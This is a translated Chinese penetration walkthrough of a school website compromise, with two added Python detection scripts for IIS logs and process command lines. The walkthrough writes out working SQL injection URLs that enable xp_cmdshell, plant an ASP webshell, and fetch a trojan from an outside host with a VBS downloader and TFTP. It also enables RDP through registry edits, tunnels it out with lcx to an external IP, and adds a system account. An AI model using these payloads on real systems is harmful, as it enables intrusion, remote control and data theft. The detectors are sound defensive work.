Author: Xiaohua [] & [SOVO of Chengdu Neusoft Academy of Information]. Reposted here with the source noted. Experts, please don't laugh at a newbie!
A few days ago I received a phone call from a high school classmate saying that his middle school's website had been tampered with. The school had bought a dedicated server and placed it in the school data center, so of course the server sits in an intranet environment. The site is written in .NET, and he asked me to check its security. The first step is to find an injection point. After searching with tools and by hand, I found an injection vulnerability in one place, good luck! Ah D reported SA permissions (figure 1):
Listing tables turned up only a few system tables, and guessing the column directory failed. I immediately ran commands in NBSI, then finally brought out the powerful Pangolin to probe, but commands could not be executed. Checking the database version with Pangolin showed that it is MSSQL 2005 (figure 2):
No wonder commands cannot be executed: MSSQL 2005 disables xp_cmdshell by default. We need to enable it first:
http://www.bkjia.com/xfjshow.aspx?fj=6';EXEC%20sp_configure%20'show%20advanced%20options',%201;RECONFIGURE;EXEC%20sp_configure%20'xp_cmdshell',%201;RECONFIGURE;--
The page returned normally, meaning the option was enabled successfully. But running a command the same way through the tool still showed no output. An earlier submission while looking for the injection point had disclosed the website's physical path, and we use that path now. The idea is to run the command and redirect its output to a file in the website directory, then fetch that file over the web to read the result. This is a common penetration technique. Let's check which services are running on the host; submit:
http://www.bkjia.com/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'net start>c:\inetpub\wwwroot\njezwz\x.txt';--
It returned normally. Visiting http://www.bkjia.com/x.txt shows the services enabled on the host (figure 3):
Commands can be executed! Now let's take the web server first. We already know the path, so first write a one-line ASP trojan:
http://www.bkjia.com/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'echo%20^<^%execute%20request("k")%^>^%20>c:\inetpub\wwwroot\njezwz\x.asp';--
The page returned normally. Visiting the trojan's address gives the message "Type Mismatch: 'execute'", so the write seems to have worked. I immediately took out the one-line trojan client and connected to the trojan, but it reported that writing failed. Was the one-liner written wrong? Check:
http://www.xxxxxx.com.cn/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'type c:\inetpub\wwwroot\njezwz\updown\x.asp>c:\inetpub\wwwroot\njezwz\updown\x.txt';--
The written shell was correct, so this is probably a permissions issue. Check the directory permissions right away:
http://www.bkjia.com/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'cacls c:\inetpub\wwwroot\njezwz\>c:\inetpub\wwwroot\njezwz\x.txt';--
It turned out the directory had read permission only. I changed the directory's permissions immediately, but even after adding write permission, connecting with the one-line client still could not write.
Depressing. In the end full control permission could not be added, so this road fails, but there are other ways. Let's see whether the server can reach the Internet:
http://www.bkjia.com/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'ping www.baidu.com>c:\inetpub\wwwroot\njezwz\x.txt';--
It returned normally, and checking the content of x.txt showed that the server can access the Internet.
Since it can access the Internet, we can use TFTP to download an ASP trojan into a directory of the website:
http://www.bkjia.com/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'tftp -i 219.140.165.41 get muma.asp c:\inetpub\wwwroot\njezwz\xx.asp';--
I stared at the TFTP server for half a day without success; it seems tftp.exe has been deleted from the server.
Let's write a VBS script to the server and use it to download our trojan! Mind the length of the VBS script: the download errors out when the process takes too long. Upload a script trojan to some web space first; note that the trojan's extension is changed to .txt.
http://www.XXXXX.com.cn/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'echo Set xPost=CreateObject(^"Microsoft.XMLHTTP^"):xPost.open ^"GET^",^"http://www.ayzx.sc.cn/msnhack.txt^",0:xPost.send():Set sGet=CreateObject(^"ADODB.stream^"):sGet.mode=3:sGet.type=1:sGet.open():sGet.write(xPost.responseBody):sGet.saveToFile ^"c:\inetpub\wwwroot\njezwz\SQL.asp^",2 >d:\z.vbs';--
It wrote fine. Now execute it to download our script trojan:
http://www.bkjia.com/xfjshow.aspx?fj=6';EXEC%20master.dbo.xp_cmdshell%20'cscript d:\z.vbs';--
The page returned normally. Visiting the trojan's address gives us the webshell (figure 5):
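From the defender's side, every step above left a trace in the IIS access log: a stacked query after the `fj` parameter, `sp_configure` turning on `xp_cmdshell`, and command output redirected under the web root. The following Python script is an added example, not code from the original post; it URL-decodes the query field of constructed IIS W3C log lines (the field order is assumed to be the common date/time/s-ip/method/stem/query/port/user/c-ip/status layout, host and client addresses are placeholders) and flags requests that carry these patterns, decoding repeatedly so that a double-encoded payload is caught too.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (sample data, not from the original post).
# Assumed field order: date time s-ip cs-method cs-uri-stem cs-uri-query
# s-port cs-username c-ip sc-status.  Client IPs are documentation placeholders.
# The fifth request is the same cscript call, but double URL-encoded.
SAMPLE_LOG = r"""
2010-03-01 10:12:01 10.0.0.5 GET /xfjshow.aspx fj=6 80 - 192.0.2.10 200
2010-03-01 10:12:45 10.0.0.5 GET /xfjshow.aspx fj=6';EXEC%20sp_configure%20'show%20advanced%20options',%201;RECONFIGURE;EXEC%20sp_configure%20'xp_cmdshell',%201;RECONFIGURE;-- 80 - 192.0.2.10 200
2010-03-01 10:13:20 10.0.0.5 GET /xfjshow.aspx fj=6';EXEC%20master.dbo.xp_cmdshell%20'net%20start>c:\inetpub\wwwroot\njezwz\x.txt';-- 80 - 192.0.2.10 200
2010-03-01 10:14:02 10.0.0.5 GET /x.txt - 80 - 192.0.2.10 200
2010-03-01 10:15:11 10.0.0.5 GET /xfjshow.aspx fj=6%27%3BEXEC%2520master.dbo.xp_cmdshell%2520%27cscript%2520d%3A%5Cz.vbs%27%3B-- 80 - 192.0.2.10 200
2010-03-01 10:16:00 10.0.0.5 GET /news.aspx id=12 80 - 192.0.2.11 200
"""

# Signatures for the injection chain seen in the write-up.  Dict order
# determines the order of the names reported per hit.
SIGNATURES = {
    # sp_configure turning xp_cmdshell on (the value 1 after the option name)
    "enable_xp_cmdshell": re.compile(r"sp_configure\s*'?\s*xp_cmdshell\s*'?\s*,\s*1\b", re.I),
    # any reference to the extended procedure at all
    "xp_cmdshell_call": re.compile(r"xp_cmdshell", re.I),
    # quote closed, then a second statement appended with a semicolon
    "stacked_query": re.compile(r"'\s*;\s*(exec|execute|declare|select|insert|update|drop)\b", re.I),
    # command output redirected into the IIS web root
    "redirect_to_webroot": re.compile(r">\s*[a-z]:\\inetpub\\wwwroot", re.I),
}


def decode_query(query, max_rounds=3):
    """URL-decode repeatedly until the text stops changing, so that a
    double-encoded payload (%2520 -> %20 -> space) is normalised as well."""
    current = query
    for _ in range(max_rounds):
        decoded = unquote_plus(current)
        if decoded == current:
            break
        current = decoded
    return current


def parse_iis_line(line):
    """Split one W3C log line into the fields this detector needs."""
    fields = line.split(" ")
    if len(fields) < 10 or fields[0].startswith("#"):
        return None
    return {
        "time": f"{fields[0]} {fields[1]}",
        "method": fields[3],
        "stem": fields[4],
        "query": fields[5],
        "client": fields[8],
        "status": fields[9],
    }


def analyse_line(line):
    """Return a finding for a suspicious request, or None for a clean one."""
    record = parse_iis_line(line)
    if record is None:
        return None
    decoded = decode_query(record["query"])
    hits = [name for name, pattern in SIGNATURES.items() if pattern.search(decoded)]
    if not hits:
        return None
    return {"time": record["time"], "client": record["client"],
            "stem": record["stem"], "hits": hits, "decoded": decoded}


def scan_log(text):
    """Run the detector over a whole log and collect the findings in order."""
    return [finding for finding in (analyse_line(line) for line in text.splitlines()
                                    if line.strip()) if finding]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["client"], finding["stem"], ", ".join(finding["hits"]))
        print("    ", finding["decoded"])
```

A hit on `enable_xp_cmdshell` is the one to page on: it means the application's database login holds sysadmin rights, which is the real root cause here. On the server itself the authoritative check is `SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'`, and the fix is a least-privilege application login rather than a single sp_configure call.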
Now let's go for the server itself. The SA password can be obtained by reading the database connection file. Executing commands through this trojan's xp_cmdshell is much more comfortable, and the output echo is good too. First set up a data source, then run commands. The port listing shows no port 3389. Running reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" shows fDenyTSConnections REG_DWORD 0x1: the value is 1, so 3389 (Terminal Services) is disabled. Change it to 0 to enable 3389:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
Checking the port status again shows 3389 is now open. Upload lcx right away and use it to listen on a port on the relay host (the "broiler"):
Broiler: d:\lcx.exe -listen 51 4000
Infiltrated host: C:\Documents and Settings\All Users\Documents\lcx.exe -slave 219.140.165.41 51 127.0.0.1 3389
After a moment, we add a system account, then connect to port 4000 on the broiler and log in to the server with the account just added (figure 6):
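The host-side half of this chain (flipping fDenyTSConnections, the lcx reverse forward of 127.0.0.1:3389, and a new local account) is visible in process-creation command lines, whatever the web log shows. The script below is an added example, not from the original post: it parses `reg add` arguments so that the detection keys on the actual value name and data rather than a loose substring, and checks for the lcx `-slave` argument pattern and `net user ... /add`. The sample command lines are constructed (the 198.51.100.7 address is a documentation placeholder), and the source of such lines, Windows process auditing or Sysmon, is assumed.

```python
import re

# Constructed sample process-creation command lines, not from the original post.
# Assumed source: Windows process auditing or Sysmon.  198.51.100.7 is a placeholder.
SAMPLE_CMDLINES = [
    r'reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"',
    r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f',
    r'C:\Documents and Settings\All Users\Documents\lcx.exe -slave 198.51.100.7 51 127.0.0.1 3389',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Example" /v Foo /t REG_SZ /d bar /f',
    r'net user backup$ P@ssw0rd /add',
]

# A token is either a double-quoted argument (kept whole) or a run of non-spaces.
TOKEN = re.compile(r'"[^"]*"|\S+')
TERMINAL_SERVER_KEY = re.compile(r"\\Control\\Terminal Server(\\|$)", re.I)
# lcx-style reverse forward: -slave <remote host> <remote port> <local host> <local port>
SLAVE_FORWARD = re.compile(r"-slave\s+(\S+)\s+(\d+)\s+(\S+)\s+(\d+)", re.I)


def tokenize(cmdline):
    """Split a cmd.exe-style command line, keeping quoted arguments intact."""
    return [tok.strip('"') for tok in TOKEN.findall(cmdline)]


def exe_name(token):
    """Base name of the executable, whether given bare or as a full path."""
    return token.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_reg_add(tokens):
    """Return {key, value, type, data} for a 'reg add' command line, else None."""
    if len(tokens) < 3 or exe_name(tokens[0]) not in ("reg", "reg.exe") \
            or tokens[1].lower() != "add":
        return None
    info = {"key": tokens[2], "value": None, "type": None, "data": None}
    names = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag in names and i + 1 < len(tokens):
            info[names[flag]] = tokens[i + 1]
            i += 2
        else:
            i += 1
    return info


def classify(cmdline):
    """Map one command line to a finding dict, or None when it is uninteresting."""
    tokens = tokenize(cmdline)
    if not tokens:
        return None
    reg = parse_reg_add(tokens)
    if reg and TERMINAL_SERVER_KEY.search(reg["key"]):
        value = (reg["value"] or "").lower()
        # fDenyTSConnections = 0 turns Terminal Services connections on
        if value == "fdenytsconnections" and reg["data"] == "0":
            return {"kind": "rdp_enabled", "detail": reg["key"]}
        if value == "portnumber":
            return {"kind": "rdp_port_set", "detail": f"PortNumber={reg['data']}"}
    match = SLAVE_FORWARD.search(cmdline)
    if match:
        remote_host, remote_port, local_host, local_port = match.groups()
        return {"kind": "reverse_port_forward",
                "detail": f"{local_host}:{local_port} -> {remote_host}:{remote_port}"}
    lowered = [tok.lower() for tok in tokens]
    if exe_name(tokens[0]) in ("net", "net.exe", "net1", "net1.exe") \
            and len(tokens) > 2 and lowered[1] == "user" and "/add" in lowered:
        return {"kind": "local_account_added", "detail": tokens[2]}
    return None


def scan_commands(cmdlines):
    """Classify every command line and return the findings with their index."""
    findings = []
    for index, cmdline in enumerate(cmdlines):
        finding = classify(cmdline)
        if finding:
            finding["index"] = index
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in scan_commands(SAMPLE_CMDLINES):
        print(f'[{finding["index"]}] {finding["kind"]}: {finding["detail"]}')
```

The three findings arriving within minutes of each other on a database host, all spawned under the SQL Server service account, are the sequence to alert on as a group; a lone PortNumber write to 3389 is the default value and is noise on its own.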